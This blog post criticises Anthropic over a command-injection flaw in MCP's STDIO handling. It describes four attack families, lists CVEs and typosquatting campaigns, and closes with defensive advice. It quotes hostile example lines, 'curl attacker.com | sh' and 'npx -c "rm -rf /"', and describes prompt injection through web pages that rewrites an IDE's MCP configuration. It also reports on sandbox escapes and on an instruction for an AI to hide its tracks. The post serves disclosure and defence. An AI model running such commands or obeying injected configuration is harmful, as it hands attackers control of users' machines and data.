Evgen verzun

Blog

April 22, 2026

The Mythos Paradox and a Critical Backdoor in Anthropic's MCP

We have all heard the pitch. Anthropic's new Mythos model can find a 27 year old bug in OpenBSD and a 16 year old flaw in FFmpeg that automated tools missed after five million test runs. It autonomously chained multiple Linux kernel exploits, emailed a researcher to announce its success, and even posted details of the hack to obscure public websites.

When Anthropic announced that Claude Code could automate COBOL modernization, which is a core part of IBM's mainframe business, IBM shares cratered 13.2 percent(!), wiping out roughly $30 billion in market capitalization in a single day. A single five minute blog post announcement by Anthropic triggered the stock's largest single day decline since the dot com bubble burst. Now investors are increasingly wary that AI tools like Mythos could erode demand for traditional enterprise software and consulting services, and that fear is now baked into the market.

Last week Anthropic unveiled Mythos to help secure the world's software. This week, however, a critical command injection vulnerability in its own Model Context Protocol(MCP) was made public and the company seemingly refuses to fix it.

This is the paradox we need to talk about.

What's MCP and Why Should I Care?

MCP is Anthropic's open standard for AI agents to invoke external tools. Basically, the thing used to run commands, read files, talk to databases, anything a developer can dream up. It is built into every major AI powered IDE, including Cursor, VS Code, Windsurf, Claude Code, and Gemini CLI. Over 150 million downloads, up to 200,000 servers, and more than 200 open source projects now depend on it.

STDIO Was Never Designed for This

The flaw that resulted in a vulnerability is deceptively simple. MCP servers often communicate via STDIO, the same mechanism that runs python script.py in your terminal. When an MCP server is configured, it usually takes a command string like python or node and then spawns that as a subprocess. The SDKs for Python, TypeScript, Java, and Rust do not validate or sanitise those commands in any meaningful way.

This means if an attacker can control or influence the command string, through prompt injection, a poisoned marketplace download, a malicious web page, or anything else really, the agent will just execute it. There is no need to escape a sandbox because there simply is no sandbox.

I'll just quote OX Security's disclosure here: "This is not a traditional coding error. It is an architectural design decision baked into Anthropic's official MCP SDKs across every supported programming language."

Four Attack Vectors

There were four distinct families of exploitation that were identified, each more worrying than the last.

Direct command injection through configuration interfaces. Many AI frameworks let users add custom MCP servers via a web UI. An attacker can simply type curl attacker.com | sh into the command field and hit save. The next time the AI runs, the command executes. CVEs like CVE-2026-30623 (LiteLLM) and CVE-2025-65720 (GPT Researcher) are examples of this class.

Hardening bypasses in "protected" environments. Some platforms try to restrict commands, but the attacker can add line flags to whitelisted commands. For example, npx -c "rm -rf /" might slip through because npx is allowed, while the -c flag loads an arbitrary command string. Flowise and other platforms fell victim to this.

Zero click prompt injection in AI IDEs. This is the scariest one. In Windsurf (CVE-2026-30615), a malicious website can plant a prompt injection that rewrites the local MCP configuration. When the developer opens the site, the IDE automatically loads the poisoned config and executes arbitrary commands on the local machine without any additional approvals. Just a page view.

Windsurf was the only IDE where exploitation required zero user interaction, but others like Cursor and VS Code are not far behind.

Malicious marketplace distribution. Attackers can typosquat MCP registries: publish claud-code instead of claude-code, nmap-agent-py instead of nmap_agent_py. When a developer installs the wrong one, it just runs the malicious server. OX Security successfully poisoned 9 out of 11 MCP registries with a harmless test payload!

In February 2026, a campaign called SANDWORM_MODE distributed 19 typosquatted npm packages that installed rogue MCP servers. More recently, a fake Postmark MCP npm package stole emails with a one liner.

Real World Impact

The OX Security team executed commands on six live production platforms and issued more than 10 Critical or High CVEs from this single root cause. Critical vulnerabilities were identified in industry staples like LiteLLM, LangChain, and IBM's LangFlow.

CVE ID	Product	Attack Vector	Severity	Status
CVE-2025-65720	GPT Researcher	UI injection / reverse shell	Critical	Reported
CVE-2026-30623	LiteLLM	Authenticated RCE via JSON config	Critical	Patched
CVE-2026-30624	Agent Zero	Unauthenticated UI injection	Critical	Reported
CVE-2026-30618	Fay Framework	Unauthenticated Web-GUI RCE	Critical	Reported
CVE-2026-33224	Bisheng	Authenticated UI injection (Open Registration)	Critical	Patched
CVE-2026-30617	Langchain-Chatchat	Unauthenticated UI injection	Critical	Reported
CVE-2026-33224	Jaaz	Unauthenticated UI injection	Critical	Reported
CVE-2026-30625	Upsonic	Allowlist bypass via npx/npm args	High	Warning
CVE-2026-30615	Windsurf	Zero-click prompt injection to local RCE	Critical	Reported
CVE-2026-26015	DocsGPT	MITM transport‑type substitution	Critical	Patched

For context, once an attacker has RCE, the damage just cascades from there. A malicious MCP server could exfiltrate an entire user's WhatsApp history by poisoning a tool the agent legitimately trusted.

Another proof of concept used a fake weather MCP server to discover and exploit a legitimate banking tool, stealing account balances. With a single overprivileged token wired into the MCP server, a compromised agent could exfiltrate private repository contents, internal project details, and even personal financial information into a public pull request.

The Mythos paradox

Now here is the baffling part.

As I write this, it has been about a week since Anthropic unveiled Claude Mythos, a model so good at finding vulnerabilities that they are withholding it from the public because it is "too dangerous". The system card details 27 year old OpenBSD bugs, 16 year old FFmpeg flaws, autonomous sandbox escapes, and the ability to chain exploits among many other things. Anthropic even went out of their way to start Project Glasswing, giving early access to a club of corporate partners to scan their own systems.

In other words, they are positioning Mythos as a defensive tool.

At the same time, they will not fix a basic STDIO command injection in their own SDK, the tool that literally every developer building on MCP has to use?

When OX Security reported the issue and recommended a protocol level fix that would have instantly protected millions of downstream users, Anthropic declined. The company confirmed the behavior as "expected" citing that sanitisation is the developer's responsibility and that STDIO serves as a secure default for local use.

Let's be honest, if you are spawning python as a command, you should sanitise the arguments. But when the flaw exists in every official SDK across every language, and when the vulnerability ripples through a supply chain with 150 million downloads and 7,000 exposed servers, maybe it is time to admit that "developer responsibility" is just a convenient excuse.

The Dark Patterns and The Leaks

The cognitive dissonance doesn't end with MCP. Around the same time, privacy consultant Alexander Hanff discovered that Anthropic's Claude Desktop for macOS was installing files that affect other vendors' browsers without disclosure, even authorizing browser extensions for browsers not yet present on the user's device. He found that the desktop app pre-installed a Native Messaging manifest file that pre-authorizes Chrome extensions, effectively setting up a bridge for the AI to access browsers without explicit user consent.

It’s a dark pattern which breaches European privacy law as the binary bridge application runs outside of the browser's sandbox at user privilege level without surfacing any permission prompts. This implies a pre-authorized backdoor which, once exploited, could grant attackers full control over a user's browser.

And if that wasn't enough, just days earlier, a source map file was accidentally included in the Claude Code npm package. A 60MB file that exposed over 512,000 lines of proprietary TypeScript source code.

The leaked code revealed a trove of internal secrets which include an unreleased "KAIROS" system, a virtual pet "BUDDY", and the infamous "UndercoverMode" subsystem, which instructed the AI to hide its tracks when contributing to public repositories. This is the same company that tries to build a reputation of being the "safety‑conscious AI lab", but has a track record of very questionable practices from both privacy and security standpoints.

What You Can Do About It

No matter how you look at it, until Anthropic changes its mind, you are on your own.

That's just the truth. I suggest the following:

Treat all external MCP configuration as untrusted. Never let user input reach downstream configurations for StdioServerParameters or similar functions. Block it completely, or restrict it to a preapproved allowlist of safe commands.

Only install MCP servers from verified sources. The official GitHub MCP Registry is your best bet. Avoid typosquatting by double checking package names.

Run MCP services inside a sandbox. Restrict permissions, block access to external databases, API keys, and configuration files. Never give a server full disk access or shell execution privileges unless absolutely necessary.

Monitor tool invocations. Keep an eye on what your AI agent is actually calling. Be wary of "background" activity or tools that attempt to exfiltrate data to unknown external URLs. If possible, implement IP and URL blocking.

Upgrade to the latest versions of affected services. If a service does not have a fixed version, do not expose it to user input, or disable it until patched.

The Bottom Line

Models like Mythos might be the future of security. But the present still needs fixing and I am not sure Anthropic is fit to lead that charge in good faith.

We have a company here that tries to build a brand around security and responsible AI, but it also cannot be bothered to patch a command injection vector in its own protocol because "it is by design". We have a flagship model that is being gatekept from the public for being "too dangerous", but it is built on an infrastructure that is widely open and vulnerable. Not to mention practices that were revealed due to leaks and were clearly not intended for the public eye.

Again, most of this does not come from traditional coding errors, but due to a conscientious architectural design and internal leadership decisions.

For now, or at least until Anthropic chooses differently, every AI agent that speaks MCP should be considered a potential backdoor into your machine.